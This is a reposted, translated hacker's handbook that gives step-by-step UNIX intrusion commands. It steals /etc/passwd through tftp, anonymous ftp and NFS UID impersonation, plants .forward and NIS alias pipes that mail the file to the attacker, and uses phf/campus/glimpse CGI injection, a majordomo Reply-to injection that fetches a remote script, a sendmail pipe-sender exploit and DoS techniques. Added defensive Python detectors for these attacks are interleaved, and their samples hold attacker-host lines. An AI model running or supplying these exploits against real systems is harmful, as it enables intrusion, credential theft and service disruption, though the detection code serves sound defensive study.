
Practical Network Intrusion Tactics Handbook (UNIX) (2)

Enumerate victim.com's system type (e.g. SunOS 5.7), the services it offers (e.g. WWW) and the vulnerabilities present.

II. Striking the ox from behind the mountain (remote attacks)

1) Fetching things from thin air: obtaining passwd

1.1) tftp

# tftp numen

tftp> get /etc/passwd

Error code 2: Access violation

tftp> get /etc/shadow

Error code 2: Access violation

tftp> quit

(samsa: nothing gained, but...)

# tftp sun8

tftp> get /etc/passwd

Received 965 bytes in 0.1 seconds

tftp> get /etc/shadow

Error code 2: Access violation

(samsa: got it!!! ;-)

# cat passwd

root:x:0:0:Super-User:/:/bin/ksh

daemon:x:1:1::/:

bin:x:2:2::/usr/bin:

sys:x:3:3::/:/bin/sh

adm:x:4:4:Admin:/var/adm:

lp:x:71:8:Line Printer Admin:/usr/spool/lp:

smtp:x:0:0:Mail Daemon User:/:

uucp:x:5:5:uucp Admin:/usr/lib/uucp:

nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:Nobody:/:

noaccess:x:60002:60002:No Access User:/:

ylx:x:10007:10::/users/ylx:/bin/sh

wzhou:x:10020:10::/users/wzhou:/bin/sh

wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh

(samsa: a pity it's shadowed :-/)

1.2) Anonymous ftp

1.2.1) Direct retrieval

# ftp sun8

Connected to sun8.

220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.

Name (sun8:root): anonymous

331 Guest login ok, send ident as password.

Password:

(samsa: your e-mail address; a fake one, of course :->)

230 Guest login ok, access restrictions apply.

ftp> ls

200 PORT command successful.

150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).

bin

dev

etc

incoming

pub

usr

226 ASCII Transfer complete.

35 bytes received in 0.85 seconds (0.04 Kbytes/s)

ftp> cd etc

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).

group

passwd

226 ASCII Transfer complete.

15 bytes received in 0.083 seconds (0.18 Kbytes/s)

ftp> get passwd

200 PORT command successful.

150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).

226 ASCII Transfer complete.

local: passwd remote: passwd

231 bytes received in 0.038 seconds (5.98 Kbytes/s)

# cat passwd

root:x:0:0:Super-User:/:/bin/ksh

daemon:x:1:1::/:

bin:x:2:2::/usr/bin:

sys:x:3:3::/:/bin/sh

adm:x:4:4:Admin:/var/adm:

uucp:x:5:5:uucp Admin:/usr/lib/uucp:

nobody:x:60001:60001:Nobody:/:

ftp:x:210:12::/export/ftp:/bin/false

(samsa: as expected! Fools who leave the complete passwd under the anonymous ftp directory are too rare)

1.2.2) ftp home directory writable

# cat forward_sucker_file

"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"

# ftp victim.com

Connected to victim.com

220 victim FTP server ready.

Name (victim.com:zen): ftp

331 Guest login ok, send ident as password.

Password:[your e-mail address:forged]

230 Guest login ok, access restrictions apply.

ftp> put forward_sucker_file .forward

43 bytes sent in 0.0015 seconds (28 Kbytes/s)

ftp> quit

# echo test | mail ftp@victim.com

(samsa: now wait for the passwd file to arrive by mail...)

1.3) WWW

The famous CGI bugs

1.3.1) phf

http://silly.com/cgi-bin/nph-test-cgi?*

http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd

1.3.2) campus

http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd

1.3.3) glimpse

http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me:@my.e-mail.

addr

(samsa: the line was too long so I folded it; no problem, right? ;-)
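All three requests in 1.3 share two traits a web server log makes obvious: the script name is one of a handful of known-bad CGIs, and the argument carries an encoded newline or shell metacharacter. The scanner below is an added example, not the handbook's code; it assumes Common Log Format and its sample log is constructed, with the request strings taken from the URLs above and an obviously fake mail address in the glimpse line.

```python
"""Flag requests to the CGI programs named in 1.3 in a web server access log.

Added example for this handbook, not the original's code. It assumes Common
Log Format lines; SAMPLE_LOG is constructed, with the request strings taken
from the URLs the section shows and an obviously fake mail address.
"""
import re
from urllib.parse import unquote

# Constructed access-log sample (CLF). Two benign lines, three probes.
SAMPLE_LOG = """\
192.0.2.10 - - [11/May/1999:18:04:00 +0800] "GET /index.html HTTP/1.0" 200 1043
192.0.2.77 - - [11/May/1999:18:04:05 +0800] "GET /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd HTTP/1.0" 200 512
192.0.2.77 - - [11/May/1999:18:04:09 +0800] "GET /cgi-bin/campus?%0a/bin/cat%0a/etc/passwd HTTP/1.0" 404 0
192.0.2.78 - - [11/May/1999:18:05:00 +0800] "GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me:@attacker.example HTTP/1.0" 200 90
192.0.2.11 - - [11/May/1999:18:06:00 +0800] "GET /cgi-bin/search?q=unix+handbook HTTP/1.0" 200 2048
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)$'
)
# CGI programs the handbook lists as exploitable; a request to one is worth an alert on its own.
KNOWN_BAD_CGI = {"phf", "nph-test-cgi", "campus", "aglimpse"}
CGI_NAME_RE = re.compile(r"/cgi-bin/([^/?]+)")
SHELL_META_RE = re.compile(r"[|;`]|IFS=")


def classify_request(path):
    """Return the list of reasons a request path looks like a CGI attack (empty if none)."""
    reasons = []
    decoded = unquote(path)          # %0a -> newline, %20 -> space, ...
    m = CGI_NAME_RE.search(path)
    if m and m.group(1) in KNOWN_BAD_CGI:
        reasons.append(f"known-vulnerable CGI: {m.group(1)}")
    if "\n" in decoded or "\r" in decoded:
        reasons.append("newline in CGI argument")
    if SHELL_META_RE.search(decoded):
        reasons.append("shell metacharacters in CGI argument")
    if "/etc/passwd" in decoded:
        reasons.append("reads /etc/passwd")
    return reasons


def scan_access_log(text):
    """Return one dict per suspicious request, in log order; unparsable lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("path"))
        if reasons:
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status")), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(h["ip"], h["status"], h["path"], "->", "; ".join(h["reasons"]))
```

The status code is deliberately not used to filter: a 404 for `campus` still tells you someone is probing, and removing the scripts from `cgi-bin` is the fix, not silencing the log.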

1.4) nfs

1.4.1) If /etc is exported, nothing more needs to be said

1.4.2) If some user's home directory is exported

# showmount -e numen

export list for numen:

/space/users/lpf sun9

/space/users/zw (everyone)

# mount -F nfs numen:/space/users/zw /mnt

# cd /mnt

# ls -ld .

drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .

# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd

# echo zw::::::::: >> /etc/shadow

# su zw

$ cat >.forward

"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"

^D

# echo test | mail zw@numen

(samsa: wait for your mail....)
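The `showmount -e` output in 1.4.2 is the same output a defender can audit: an export to `(everyone)`, an exported home directory (whose dotfiles any client that presents the matching UID can write), or an exported `/etc`. The following is an added example, not the handbook's code; its sample is constructed from the 1.4.2 listing with two extra lines, and the path prefixes it treats as home and system directories are assumptions to adapt per site.

```python
"""Audit `showmount -e` output for the export mistakes that 1.4 relies on.

Added example for this handbook, not the original's code. SAMPLE_SHOWMOUNT is
constructed from the listing in 1.4.2 with two extra lines; the prefixes in
HOME_PREFIXES and SYSTEM_PREFIXES are assumptions to adapt per site.
"""

# Constructed sample, modelled on the 1.4.2 output.
SAMPLE_SHOWMOUNT = """\
export list for numen:
/space/users/lpf sun9
/space/users/zw  (everyone)
/etc             (everyone)
/export/tools    sun9,sun8
"""

# Assumed site conventions: where home directories and system files live.
HOME_PREFIXES = ("/space/users/", "/export/home/", "/home/", "/users/")
SYSTEM_PREFIXES = ("/etc", "/usr", "/var")


def parse_showmount(text):
    """Map each exported path to a sorted list of permitted clients."""
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        path, _, clients = line.partition(" ")
        clients = clients.strip()
        if clients == "(everyone)":
            exports[path] = ["(everyone)"]
        else:
            exports[path] = sorted(c for c in clients.split(",") if c)
    return exports


def _is_system_path(path):
    return path == "/" or any(path == s or path.startswith(s + "/") for s in SYSTEM_PREFIXES)


def audit_exports(text):
    """Return findings: world exports, exported home dirs, exported system dirs."""
    exports = parse_showmount(text)
    return {
        # Anyone who can reach the server can mount these and read (often write) them.
        "world": sorted(p for p, cl in exports.items() if cl == ["(everyone)"]),
        # NFS trusts the client's UID: a client with uid 1005 owns zw's .forward and .rhosts.
        "home_dirs": sorted(p for p in exports if p.startswith(HOME_PREFIXES)),
        # /etc, /usr, /var or / exported means passwd, shadow or the whole tree is readable off-host.
        "system_dirs": sorted(p for p in exports if _is_system_path(p)),
    }


if __name__ == "__main__":
    for check, paths in audit_exports(SAMPLE_SHOWMOUNT).items():
        print(f"{check}: {paths}")
```

Root squashing does not help here: the attack in 1.4.2 never uses UID 0, it uses UID 1005, which the server accepts as-is. The only remedies are exporting to named hosts (or not at all) and keeping home directories off exports that untrusted hosts can mount.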

1.5) sniffer

Exploits the broadcast nature of Ethernet to eavesdrop on the IP packets passing over the network and so obtain passwords.

For the principles and technical details of sniffers, see [samsa 1999].

(samsa: not much fun; it has a ``winning without honour'' feel to it...)

1.6) NIS

1.6.1) Guess the domain name, then use ypcat (or, for NIS+, niscat) to obtain passwd (even shadow)

1.6.2) If the NIS server can be controlled, a mail alias can be created

nis-master # echo 'foo: "| mail me@my.e-mail.addr < /etc/passwd "' >> /etc/aliases

nis-master # cd /var/yp

nis-master # make aliases

nis-master # echo test | mail -v foo@victim.com



1.7) e-mail

e.g. exploiting the majordomo (ver. 1.94.3) vulnerability

Reply-to: a~.`/usr/bin/rcp${IFS}me@hacker.home.edu:script${IFS}/tmp/script;;source${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\@his.e-mail



# cat script

/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr

#

1.8) sendmail

Exploiting the sendmail 5.55 vulnerability:

# telnet victim.com 25

Trying xxx.xxx.xxx.xxx...

Connected to victim.com

Escape character is '^]'.

220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04

mail from: "|/bin/mail me@my.e-mail.addr < /etc/passwd"

250 "|/bin/mail me@my.e-mail.addr < /etc/passwd"... Sender ok

rcpt to: nosuchuser

550 nosuchuser... User unknown

data

354 Enter mail, end with "." on a line by itself

..

250 Mail accepted

quit

Connection closed by foreign host.

(samsa: wait...)
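Sections 1.2.2, 1.4.2, 1.6.2 and 1.8 are one bug wearing four hats: a mail address that begins with `|` is a program to run, and the attacker only needs somewhere to write one (a `.forward`, the aliases map) or a sendmail old enough to accept it as the envelope sender. The audit below is an added example, not sendmail's or the handbook's code; its sample `.forward` and `aliases` contents and its allow-list of pipe programs are constructed assumptions.

```python
"""Find mail recipients that run a program, which 1.2.2, 1.4.2, 1.6.2 and 1.8 all abuse.

Added example for this handbook, not sendmail's or the original's code. It
handles the two places a '|program' recipient can be planted (a user's
.forward and the aliases file) and the envelope sender of an SMTP session.
The samples and the allow-list of programs are constructed assumptions.
"""
import shlex

# Programs a site might legitimately allow mail to be piped to (assumed list).
ALLOWED_PIPE_PROGRAMS = {"/usr/bin/vacation", "/usr/bin/procmail"}

# Constructed samples.
SAMPLE_ALIASES = """\
# aliases(5), constructed
postmaster: root
webmaster: wzhang, ylx
foo: "| mail someone@attacker.example < /etc/passwd "
lists: :include:/etc/mail/lists
"""
SAMPLE_FORWARD = """\
zw@backup.example.test
"|/usr/bin/vacation zw"
"""


def normalize_address(addr):
    """Strip whitespace, an outer <...> and an outer pair of double quotes."""
    a = addr.strip()
    if a.startswith("<") and a.endswith(">"):
        a = a[1:-1].strip()
    if len(a) >= 2 and a.startswith('"') and a.endswith('"'):
        a = a[1:-1].strip()
    return a


def program_of(addr):
    """Return the program a '|' recipient would execute, or None for a normal address."""
    a = normalize_address(addr)
    if not a.startswith("|"):
        return None
    try:
        argv = shlex.split(a[1:])
    except ValueError:            # unbalanced quotes: report the raw command text
        return a[1:].strip()
    return argv[0] if argv else ""


def split_recipients(rhs):
    """Split a comma-separated recipient list, leaving quoted commands intact."""
    parts, cur, in_quote = [], [], False
    for ch in rhs:
        if ch == '"':
            in_quote = not in_quote
        if ch == "," and not in_quote:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def audit_recipients(text, kind):
    """Scan an aliases file (kind='aliases') or a .forward file (kind='forward').

    Returns (owner, target, verdict) tuples: verdict is 'flag' for a program not
    on the allow-list, 'allowed' for one that is, 'review' for :include: files.
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if kind == "aliases":
            if ":" not in line:
                continue
            owner, rhs = (s.strip() for s in line.split(":", 1))
        else:
            owner, rhs = "<owner>", line
        for rcpt in split_recipients(rhs):
            prog = program_of(rcpt)
            if prog is not None:
                verdict = "allowed" if prog in ALLOWED_PIPE_PROGRAMS else "flag"
                findings.append((owner, prog, verdict))
            elif rcpt.startswith(":include:"):
                findings.append((owner, rcpt[len(":include:"):], "review"))
    return findings


def sender_runs_program(envelope_sender):
    """True when an SMTP MAIL FROM argument is a '|command' address (section 1.8)."""
    return program_of(envelope_sender) is not None


if __name__ == "__main__":
    print(audit_recipients(SAMPLE_ALIASES, "aliases"))
    print(audit_recipients(SAMPLE_FORWARD, "forward"))
    print(sender_runs_program('"|/bin/mail me@my.e-mail.addr < /etc/passwd"'))
```

Only the first word of the command is reported, which is enough to decide whether it belongs on the allow-list; the remedies the checks point at are an unwritable anonymous-ftp home (1.2.2), no exported home directories (1.4.2), a protected aliases map (1.6.2) and a sendmail that rejects program addresses as senders (1.8).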

2) Remote control

2.1) DoS attacks

2.1.1) Syn-flooding

Send the target a large number of TCP connection requests without completing the three-way handshake that TCP requires, so the target system sits waiting and its network resources are consumed, making its network services unavailable.

2.1.2) Ping-flooding

Send the target system a large number of ping packets, i.e. ICMP_ECHO packets, so that its network interface cannot keep up.



2.1.3) Udp-storming

Like 2.1.2), but sending large numbers of udp packets.

2.1.4) E-mail bombing

Send a large volume of e-mail to the target's mailbox so that it has no capacity left to receive normal mail.

2.1.5) Nuking

Send a small amount of specific data to a certain port on the target system to make it crash.

2.1.6) Hi-jacking

Impersonate one side of a particular network connection and send specific packets (FIN or RST) onto the network to terminate that connection;
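The Syn-flooding entry in 2.1.1 describes the symptom a host shows while under attack: a connection table full of half-open entries. The snapshot analysis below is an added example, not the handbook's code; its input is a constructed `netstat -an`-style table (column order is an assumption) and it also covers the case the description implies but does not spell out: when source addresses are spoofed at random, no single source stands out, so the share of half-open entries in the whole table has to be checked as well.

```python
"""Spot a SYN flood (2.1.1) from a connection-table snapshot.

Added example for this handbook, not the original's code. SAMPLE_NETSTAT is a
constructed snapshot in the 'proto recvq sendq local foreign state' shape of
`netstat -an`; column order and thresholds are assumptions to adjust per host.
"""
from collections import Counter

# Constructed snapshot: two real sessions and eight half-open connections,
# four from one source and four from sources that each appear only once.
SAMPLE_NETSTAT = """\
tcp 0 0 192.168.0.198:80 198.51.100.20:34567 ESTABLISHED
tcp 0 0 192.168.0.198:25 198.51.100.21:1044 ESTABLISHED
tcp 0 0 192.168.0.198:80 203.0.113.7:1025 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.7:1026 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.7:1027 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.7:1028 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.9:2000 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.10:2000 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.11:2000 SYN_RECV
tcp 0 0 192.168.0.198:80 203.0.113.12:2000 SYN_RECV
"""

# Linux / BSD / Solaris spellings of the "SYN seen, ACK not yet received" state.
HALF_OPEN_STATES = {"SYN_RECV", "SYN_RCVD", "SYN_RECEIVED"}


def parse_connections(text):
    """Return (local_port, remote_ip, state) for each TCP line in the snapshot."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local, remote, state = fields[3], fields[4], fields[5]
        local_port = int(local.rsplit(":", 1)[1])
        remote_ip = remote.rsplit(":", 1)[0]
        rows.append((local_port, remote_ip, state))
    return rows


def assess_syn_flood(text, per_source=3, half_open_ratio=0.5):
    """Return counts plus a verdict covering both a single-source and a spoofed flood.

    A flood from one real host shows up as many half-open entries from one IP;
    a flood with random spoofed sources does not, so the share of half-open
    entries in the whole table is checked as well.
    """
    rows = parse_connections(text)
    half_open = [(port, ip) for port, ip, state in rows if state in HALF_OPEN_STATES]
    established = sum(1 for _, _, state in rows if state == "ESTABLISHED")
    by_source = Counter(ip for _, ip in half_open)
    noisy = sorted(((ip, n) for ip, n in by_source.items() if n >= per_source),
                   key=lambda x: (-x[1], x[0]))
    ratio = len(half_open) / len(rows) if rows else 0.0
    return {
        "half_open": len(half_open),
        "established": established,
        "targets": dict(Counter(port for port, _ in half_open)),   # which service is hit
        "noisy_sources": noisy,
        "half_open_ratio": ratio,
        "flood_suspected": bool(noisy) or ratio >= half_open_ratio,
    }


if __name__ == "__main__":
    for k, v in assess_syn_flood(SAMPLE_NETSTAT).items():
        print(f"{k}: {v}")
```

Because the spoofed case defeats per-source blocking, the durable mitigation is on the host: a larger backlog for the listening service and SYN cookies where the kernel offers them, so that half-open entries stop costing memory at all.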

2.2) WWW (remote execution)

2.2.1) phf CGI

2.2.2) campus CGI

2.2.3) glimpse CGI

(samsa: I saw on the net that NT also has a buggy CGI called websn.exe; details unknown)

2.3) e-mail

Same as 1.7, exploiting the majordomo (ver. 1.94.3) vulnerability

2.4) sunrpc: rexd

(to be continued)

Source of this reposted article: http://www.cnpaf.net/Class/hack/05121820345017640226.htm
